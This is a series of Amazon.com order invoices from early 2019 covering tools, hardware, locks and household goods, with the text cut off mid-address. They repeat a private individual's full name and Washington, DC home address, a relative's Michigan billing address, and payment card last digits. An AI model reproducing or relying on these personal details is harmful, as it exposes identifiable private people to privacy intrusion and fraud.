Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $46.44 Visa | Last digits: 4401 Shipping & Handling: $0.00 ---- Billing address Total before tax: $46.44 Brian Coady Estimated tax to be collected: $2.79 1454 MONROE ST NW ---- WASHINGTON, DC 20010-3139 Grand Total:$49.23 United States Credit Card transactions Visa ending in 4401: April 4, 2019:$49.23 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #113-0404661-7540220 Order Placed: March 31, 2019 Amazon.com order number: 113-0404661-7540220 Order Total: $13.98 Shipped on April 1, 2019 Items Ordered Price 2 of: Whizzotech AA Battery Storage Case Battery Holder Organizer Box BL05 (holds 24 $6.99 AA) Sold by: whizzotech (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $13.98 Visa | Last digits: 4401 Shipping & Handling: $0.00 Billing address Total before tax: $13.98Brian Coady Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$13.98 United States Credit Card transactions Visa ending in 4401: April 1, 2019:$13.98 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-1570799-2121817 Order Placed: March 24, 2019 Amazon.com order number: 113-1570799-2121817 Order Total: $8.99 Shipped on March 24, 2019 Items Ordered Price 1 of: Whizzotech Battery Organizer Storage Case for AA AAA C D 9V Battery Holder Box $8.99 Container BL12 Sold by: whizzotech (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $8.99 Visa | Last digits: 4401 Shipping & Handling: $0.00 Billing address Total before tax: $8.99Brian Coady Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$8.99 United States Credit Card transactions Visa ending in 4401: March 24, 2019:$8.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-0299961-4069025 Order Placed: March 23, 2019 Amazon.com order number: 113-0299961-4069025 Order Total: $33.97 Shipped on March 23, 2019 Items Ordered Price 1 of: Coolnice No Tie Shoe Laces for Men and Women Silicone Elastic Waxed Thin $7.99 Oxford Round Shoelaces for Dress and Leather Shoes 10pcs 4cm Black+12pcs Mix Size Black Sold by: Coolnice LLC (seller profile) Condition: New 1 of: HOMAR No Tie Shoelaces for Kids and Adults -Best in Sports Fan Shoelaces -$7.99 Waterproof Silicone Flat Elastic Athletic Running Shoe Laces with Multicolor for Sneaker Boots Board Shoes and Casual Shoes Sold by: HomarTech (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on March 24, 2019 Items Ordered Price 1 of: HICKIES 2.0 Performance One-Size Fits All No Tie Elastic Lacing System -White $17.99 Gold (14 HICKIES Shoelaces) Sold by: HICKIES (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Visa | Last digits: 4401 Item(s) Subtotal: $33.97 Shipping & Handling: $0.00 ---- Billing address Brian Coady 1454 MONROE ST NW Total before tax: $33.97 Estimated tax to be collected: $0.00 ---- WASHINGTON, DC 20010-3139 United States Grand Total:$33.97 Credit Card transactions Visa ending in 4401: March 24, 2019:$33.97 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-8196701-2127435 Order Placed: March 23, 2019 Amazon.com order number: 113-8196701-2127435 Order Total: $74.31 Shipped on March 23, 2019 Items Ordered 1 of: POWERTEC 71080 Center Finder Sold by: Amazon.com Services LLC Condition: New Price $6.49 Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on March 24, 2019 Items Ordered 1 of: FineSource Electronic Digital Caliper Inch/Metric Conversion 0-6 Inch/150 mm Carbon Fiber Gauge Micrometer Extra Large LCD Screen Auto Off Featured Measuring Tool -Black Sold by: UBANTE (seller profile) Condition: New Price $9.99 Print this page for your records. Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on March 23, 2019 Items Ordered Price 1 of: Mr. Pen-15 Pcs Compass Set with Swing Arm Protractor (6"), Geometry Set for Students, Geometry Set for School, Divider, Set Squares, Ruler, Protractor, Compass Math, Compass and Protractor, Eraser Sold by: Mr. Pen (seller profile) $9.99 Condition: New New 2 of: Big Horn 19053C 3 Pieces 8-Inch Spring Caliper / Divider Set Sold by: Amazon.com Services LLC $18.14 Condition: New 1 of: T&B 6Inch 150mm Mini Caliper Double Scale Plastic Vernier Caliper for Jewelry Sliding Gauge Ruler Measuring Tool 5PCS (Mint Green) Sold by: T&B INC (seller profile) $8.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $71.74 Visa | Last digits: 4401 Shipping & Handling: $0.00 Billing address Total before tax: $71.74Brian Coady Estimated tax to be collected: $2.571454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$74.31 United States Credit Card transactions Visa ending in 4401: March 24, 2019:$67.43 Visa ending in 4401: March 23, 2019: $6.88 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-3199393-7855440 Order Placed: March 19, 2019 Amazon.com order number: 113-3199393-7855440 Order Total: $14.99 Shipped on March 21, 2019 Items Ordered Price 1 of: Erythritol Sweetener Natural Sugar Substitute 3lb -Granulated Low Calorie Sweetener High Digestive Tolerance Suitable for Diabetes Keto and Paleo -Baking Substitute Non GMO Sold by: JSI Comm (seller profile) $14.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $14.99 Visa | Last digits: 4401 Shipping & Handling: $0.00 Billing address Total before tax: $14.99 Brian Coady Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$14.99 United States Credit Card transactions Visa ending in 4401: March 21, 2019:$14.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-9156870-9217852 Order Placed: March 14, 2019 Amazon.com order number: 113-9156870-9217852 Order Total: $2.49 Shipped on March 18, 2019 Items Ordered Price 1 of: Water & Wood 10 Meters 1.5mm/0.06" 10 Yards Waxed Wax Cotton Cord String Linen Thread Wire Jewelry Bracelet Making Assorted Sold by: HuCaiHua (seller profile) $2.49 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $2.49 Visa | Last digits: 4401 Shipping & Handling: $0.00 Billing address Total before tax: $2.49Brian Coady Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$2.49 United States Credit Card transactions Visa ending in 4401: March 18, 2019:$2.49 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-5803793-6368206 Order Placed: March 14, 2019 Amazon.com order number: 113-5803793-6368206 Order Total: $71.37 Shipped on March 15, 2019 Items Ordered 1 of: Arrow Fastener PT23G Arrow 23G Pin Nailer Sold by: Amazon.com Services LLC Price $36.75 Condition: New 1 of: AmerTac 4040TDB 1 Toggle/1 Duplex Savannah Wood Wallplate, Distressed Black Sold by: Amazon.com Services LLC $3.98 Condition: New 1 of: Amerelle 163TDDB Traditional Steel Wallplate with 1 Toggle/1 Duplex Outlet, Aged Bronze Sold by: Amazon.com Services LLC $3.87 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on March 15, 2019 Items Ordered 1 of: 2 Pieces of NuSet Double Cylinder Dead Bolts in Polished Brass Finishing, Keyed Same Sold by: Amazon.com Services LLC Price $15.75 Condition: New 1 of: Goo Gone Original Liquid -8 Ounce -Surface Safe Adhesive Remover Safely removes Stickers Labels Decals Residue Tape Chewing Gum Grease Tar Sold by: Weiman Brands (seller profile) $7.39 Condition: New Shipping Address: Print this page for your records. Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Visa | Last digits: 4401 Item(s) Subtotal: $67.74 Shipping & Handling: $0.00 ---- Billing address Brian Coady 1454 MONROE ST NW Total before tax: $67.74 Estimated tax to be collected: $3.63 ---- WASHINGTON, DC 20010-3139 United States Grand Total:$71.37 Credit Card transactions Visa ending in 4401: March 15, 2019:$71.37 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-5620186-0105067 Order Placed: March 14, 2019 Amazon.com order number: 113-5620186-0105067 Order Total: $2.29 Shipped on March 18, 2019 Items Ordered Price 1 of: Water & Wood 10 Meters 1mm 10 Yards Waxed Wax Cotton Cord String Linen Thread Wire Jewelry Bracelet Making Assorted Sold by: GuoTaoo (seller profile) $2.29 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $2.29 Visa | Last digits: 4401 Shipping & Handling: $0.00 Billing address Total before tax: $2.29Brian Coady Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$2.29 United States Credit Card transactions Visa ending in 4401: March 18, 2019:$2.29 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-3646010-1363453 Order Placed: March 14, 2019 Amazon.com order number: 113-3646010-1363453 Order Total: $11.65 Shipped on March 15, 2019 Items Ordered Price 1 of: Dishwasher Safe Hot 'N Cold Bowls -Set of 2 -Keep Food Warm or Cool for Dinners, Parties, Buffets. Sold by: SpaceBound (seller profile) $10.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $10.99 Visa | Last digits: 4401 Shipping & Handling: $0.00 Billing address Total before tax: $10.99Brian Coady Estimated tax to be collected: $0.661454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$11.65 United States Credit Card transactions Visa ending in 4401: March 15, 2019:$11.65 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-1281342-6417826 Order Placed: March 14, 2019 Amazon.com order number: 113-1281342-6417826 Order Total: $5.38 Shipped on March 18, 2019 Items Ordered Price 2 of: Water & Wood 10 Meters 1mm 10 Yards Waxed Wax Cotton Cord String Linen Thread Wire Jewelry Bracelet Making Assorted Sold by: Huangcp (seller profile) $2.69 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $5.38 Visa | Last digits: 4401 Shipping & Handling: $0.00 Billing address Total before tax: $5.38Brian Coady Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$5.38 United States Credit Card transactions Visa ending in 4401: March 18, 2019:$5.38 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-0276273-6684216 Order Placed: March 14, 2019 Amazon.com order number: 113-0276273-6684216 Order Total: $1.99 Shipped on March 18, 2019 Items Ordered Price 1 of: Water & Wood 10 Meters 1.5mm/0.06" 10 Yards Waxed Wax Cotton Cord String Linen Thread Wire Jewelry Bracelet Making Assorted Sold by: GuoXiaoRong (seller profile) $1.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $1.99 Visa | Last digits: 4401 Shipping & Handling: $0.00 Billing address Total before tax: $1.99Brian Coady Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$1.99 United States Credit Card transactions Visa ending in 4401: March 18, 2019:$1.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-8236603-2700221 Order Placed: March 5, 2019 Amazon.com order number: 113-8236603-2700221 Order Total: $317.99 Shipped on March 5, 2019 Items Ordered Price 1 of: Brother Wireless High-Speed Desktop Document Scanner, ADS-2700W, $299.99 Touchscreen LCD, Duplex Scanning Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $299.99 Visa | Last digits: 4401 Shipping & Handling: $0.00 Billing address Total before tax: $299.99Brian Coady Estimated tax to be collected: $18.001454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$317.99 United States Credit Card transactions Visa ending in 4401: March 5, 2019:$317.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-0417886-3510664 Order Placed: March 5, 2019 Amazon.com order number: 113-0417886-3510664 Order Total: $12.19 Shipped on March 5, 2019 Items Ordered Price 1 of: SquareTrade 3-Year Housewares Extended Protection Plan ($250-299.99) Sold by: Allstate Protection Plans (seller profile) $11.50 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Expedited Shipping Payment information Payment Method: Item(s) Subtotal: $11.50 Visa | Last digits: 4401 Shipping & Handling: $0.00 Billing address Total before tax: $11.50 Brian Coady Estimated tax to be collected: $0.691454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$12.19 United States Credit Card transactions Visa ending in 4401: March 5, 2019:$12.19 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-2136141-7376264 Order Placed: March 3, 2019 Amazon.com order number: 113-2136141-7376264 Order Total: $28.99 Shipped on March 4, 2019 Items Ordered Price 1 of: Power Strip Tower JACKYLED Surge Protector Electric Charging Station 3000W 13A 16AWG 10 Outlet Plugs with 4 USB Slot + 6ft Cord Wire Extension Universal Socket for PC Laptops Mobile Sold by: JACKYLED Direct (seller profile) | Product question? Ask Seller $28.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $28.99 Visa | Last digits: 4401 Shipping & Handling: $0.00 Billing address Total before tax: $28.99 Brian Coady Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$28.99 United States Credit Card transactions Visa ending in 4401: March 4, 2019:$28.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-6469345-8800262 Order Placed: March 2, 2019 Amazon.com order number: 113-6469345-8800262 Order Total: $24.65 Shipped on March 3, 2019 Items Ordered Price 1 of: Master Lock Keyed Entry Door Lock, Ball Style Knob, Polished Brass, BAO0103T (Pack of 2-Keyed Alike) Sold by: Amazon.com Services LLC $23.25 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $23.25 Visa | Last digits: 4401 Shipping & Handling: $0.00 Billing address Total before tax: $23.25Brian Coady Estimated tax to be collected: $1.401454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$24.65 United States Credit Card transactions Visa ending in 4401: March 3, 2019:$24.65 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-2151064-3846644 Order Placed: March 2, 2019 Amazon.com order number: 113-2151064-3846644 Order Total: $30.73 Shipped on March 2, 2019 Items Ordered Price 1 of: Kwikset 985 Double Cylinder Deadbolt featuring SmartKey in Venetian Bronze, KWIKSET Sold by: VM Express (seller profile) $28.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $28.99 Visa | Last digits: 4401 Shipping & Handling: $0.00 Billing address Total before tax: $28.99Brian Coady Estimated tax to be collected: $1.741454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$30.73 United States Credit Card transactions Visa ending in 4401: March 2, 2019:$30.73 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-8433721-3177834 Order Placed: March 2, 2019 Amazon.com order number: 113-8433721-3177834 Order Total: $13.07 Shipped on March 5, 2019 Items Ordered Price 1 of: General Tools 837 Metal Contour Gauge, Profile Gauge, Shape Duplicator, 6-Inch $12.33 (152mm), Stainless Steel Pins, Precisely Copy Irregular Shapes For Perfect Fit and Easy Cutting Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Payment information Payment Method: Item(s) Subtotal: $12.33 Visa | Last digits: 4401 Shipping & Handling: $0.00 Billing address Total before tax: $12.33 Brian Coady Estimated tax to be collected: $0.741454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$13.07 United States Credit Card transactions Visa ending in 4401: March 5, 2019:$13.07 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-3275920-9343456 Order Placed: March 1, 2019 Amazon.com order number: 113-3275920-9343456 Order Total: $24.99 Shipped on March 1, 2019 Items Ordered Price 1 of: Power Strip Tower-JACKYLED Surge Protector Electric Charging Station 3000W $24.99 13A 16AWG 6 Outlet Plugs with 4 USB Slot 6ft Cord Wire Extension Universal Charging Station Office Sold by: JACKYLED Direct (seller profile) | Product question? Ask Seller Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $24.99 Visa | Last digits: 4401 Shipping & Handling: $0.00 Billing address Total before tax: $24.99 Brian Coady Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$24.99 United States Credit Card transactions Visa ending in 4401: March 1, 2019:$24.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-1053045-7505049 Order Placed: February 27, 2019 Amazon.com order number: 114-1053045-7505049 Order Total: $6.88 Shipped on March 3, 2019 Items Ordered Price 1 of: Franklin Brass W10396-UN-C Square Single Toggle Switch & Duplex Wall Plate/Switch Plate/Cover, Unfinished Wood Sold by: Amazon.com Services LLC $6.49 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Payment information Payment Method: Item(s) Subtotal: $6.49 Visa | Last digits: 4401 Shipping & Handling: $0.00 Billing address Total before tax: $6.49BRIAN J COADY Estimated tax to be collected: $0.39 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$6.88 United States Credit Card transactions Visa ending in 4401: March 3, 2019:$6.88 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-0283859-0120204 Order Placed: February 26, 2019 Amazon.com order number: 114-0283859-0120204 Order Total: $20.99 Shipped on February 27, 2019 Items Ordered Price 1 of: Monthly Pill Organizer -Am/Pm Daily Pill Organizer 32 Compartments for Each Day, Pill Dispenser and Dispenser Caddy That Helps You Organize Your Life Sold by: TheSavingsMart (seller profile) | Product question? Ask Seller $20.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $20.99 MasterCard | Last digits: 5263 Shipping & Handling: $0.00 Billing address Total before tax: $20.99Andrew Coady Estimated tax to be collected: $0.0072602 8th ave. South Haven, MI 49090 Grand Total:$20.99 United States Credit Card transactions MasterCard ending in 5263: February 27, 2019:$20.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-7052683-5587443 Order Placed: February 26, 2019 Amazon.com order number: 114-7052683-5587443 Order Total: $14.49 Shipped on March 3, 2019 Items Ordered Price 1 of: Home & Craft Supplies 50 3 Mil Assorted Zip Lock Packaging Bags with Hang Holes-Clear Feature and Reclosure Sold by: Home, Garden, & Crafts (seller profile) $14.49 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Payment information Payment Method: Item(s) Subtotal: $14.49 MasterCard | Last digits: 5263 Shipping & Handling: $0.00 Billing address Total before tax: $14.49Andrew Coady Estimated tax to be collected: $0.0072602 8th ave. South Haven, MI 49090 Grand Total:$14.49 United States Credit Card transactions MasterCard ending in 5263: March 3, 2019:$14.49 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-5092165-9707467 Order Placed: February 26, 2019 Amazon.com order number: 114-5092165-9707467 Order Total: $9.99 Shipped on February 27, 2019 Items Ordered Price 1 of: But Frid 50 Piece Front Clear Plastic Ziplock Bags for Crafts Hang Hole Translucent $9.99 Heat Sealable Coffee Bags Heat Seal Sample Packs 8.5x13cm (3.3x5.1) (Translucent Matte Mixed, 50) Sold by: Sapedausy (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $9.99 MasterCard | Last digits: 5263 Shipping & Handling: $0.00 Billing address Total before tax: $9.99 Andrew Coady Estimated tax to be collected: $0.00 72602 8th ave. South Haven, MI 49090 Grand Total:$9.99 United States Credit Card transactions MasterCard ending in 5263: February 27, 2019:$9.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-0346982-0485066 Order Placed: February 25, 2019 Amazon.com order number: 114-0346982-0485066 Order Total: $45.39 Shipped on February 26, 2019 Items Ordered Price 1 of: CRC 14050 Cutting Oil Thread Cutting Lubricant, 12 Wt Oz $11.87 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on February 25, 2019 Items Ordered Price 1 of: Bosch 8 Piece Glass and Tile Bit Set with Storage Case GT3000 $30.95 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $42.82 Visa | Last digits: 4401 Shipping & Handling: $0.00 Billing address Total before tax: $42.82 BRIAN J COADY Estimated tax to be collected: $2.57 1454 MONROE ST NW ---- WASHINGTON, DC 20010 Grand Total:$45.39 United States Credit Card transactions Visa ending in 4401: February 26, 2019:$45.39 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #114-5750477-0713011 Order Placed: February 25, 2019 Amazon.com order number: 114-5750477-0713011 Order Total: $25.43 Shipped on February 25, 2019 Items Ordered Price 1 of: FEIN POWER TOOLS 63502118210 3", Carbide Saw Blade Sold by: Amazon.com Services LLC $23.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $23.99 MasterCard | Last digits: 5263 Shipping & Handling: $0.00 Billing address Total before tax: $23.99 Andrew Coady Estimated tax to be collected: $1.4472602 8th ave. South Haven, MI 49090 Grand Total:$25.43 United States Credit Card transactions MasterCard ending in 5263: February 25, 2019:$25.43 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-8483669-4948214 Order Placed: February 25, 2019 Amazon.com order number: 114-8483669-4948214 Order Total: $7.49 Shipped on February 25, 2019 Items Ordered Price 1 of: Ajent Citric Acid 100% Pure Food Grade Non-GMO (Approved for Organic Foods) 1 $7.49 Pound Sold by: Home Wise (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $7.49 Visa | Last digits: 4401 Shipping & Handling: $0.00 Billing address Total before tax: $7.49BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$7.49 United States Credit Card transactions Visa ending in 4401: February 25, 2019:$7.49 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-0441712-5164265 Order Placed: February 25, 2019 Amazon.com order number: 114-0441712-5164265 Seller's order number: 765307158573 Order Total: $14.48 Shipped on February 26, 2019 Items Ordered Price 1 of: Calcium Chloride (1 ounce) Sold by: New England Cheesemaking Supply Company (seller profile) $6.49 Condition: New 1 of: Liquid Rennet -Animal Rennet for Cheese Making Sold by: New England Cheesemaking Supply Company (seller profile) $7.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $14.48 Visa | Last digits: 4401 Shipping & Handling: $0.00 Billing address Total before tax: $14.48BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$14.48 United States Credit Card transactions Visa ending in 4401: February 26, 2019:$14.48 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-1053961-1389863 Order Placed: February 25, 2019 Amazon.com order number: 114-1053961-1389863 Order Total: $9.99 Shipped on February 27, 2019 Items Ordered Price 1 of: Oneme RJ45 Coupler, Ethernet Extension, Network Connectors for $9.99 Cat7/Cat6/Cat5e/Cat5 Ethernet Cable -Network Cable Coupler Female to Female (Blue5 Pack) Sold by: Oneme Direct (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $9.99 MasterCard | Last digits: 5263 Shipping & Handling: $0.00 Billing address Total before tax: $9.99 Andrew Coady Estimated tax to be collected: $0.00 72602 8th ave. South Haven, MI 49090 Grand Total:$9.99 United States Credit Card transactions MasterCard ending in 5263: February 27, 2019:$9.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-1857968-0125043 Order Placed: February 25, 2019 Amazon.com order number: 114-1857968-0125043 Order Total: $10.59 Shipped on February 25, 2019 Items Ordered Price 1 of: Cable Matters USB C Printer Cable (USB C to USB B/USB-C to Printer) in Black 9.8 $9.99 Feet Sold by: Cable Matters (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $9.99 Visa | Last digits: 4401 Shipping & Handling: $0.00 Billing address Total before tax: $9.99BRIAN J COADY Estimated tax to be collected: $0.601454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$10.59 United States Credit Card transactions Visa ending in 4401: February 25, 2019:$10.59 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-5118428-4509836 Order Placed: February 24, 2019 Amazon.com order number: 114-5118428-4509836 Order Total: $44.55 Shipped on February 25, 2019 Items Ordered Price 1 of: Particle Filter Respirator Mask by SoftSeal | Patented Silicone Molding for a Perfect Fit and Seal | Crush and Sweat Resistant | Comfortable Dust, Mold, and Paint Safety Mask 10 Pack (Medium) Sold by: Direct Premium Buys (seller profile) $27.60 Condition: New 1 of: Vindar Dustproof Masks, Activated Carbon Dust Mask, Filtration of Exhausts Gas, $10.99 PM2.5, Anti Pollen Allergy for Running, Cycling, Gardening, Outdoor Activities (1 Pack-Blue) Sold by: Vindar (seller profile) Condition: New 1 of: 20 lb. ABC Fire Extinguisher Hook $5.96 Sold by: Mobile deals (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $44.55 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $44.55 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, 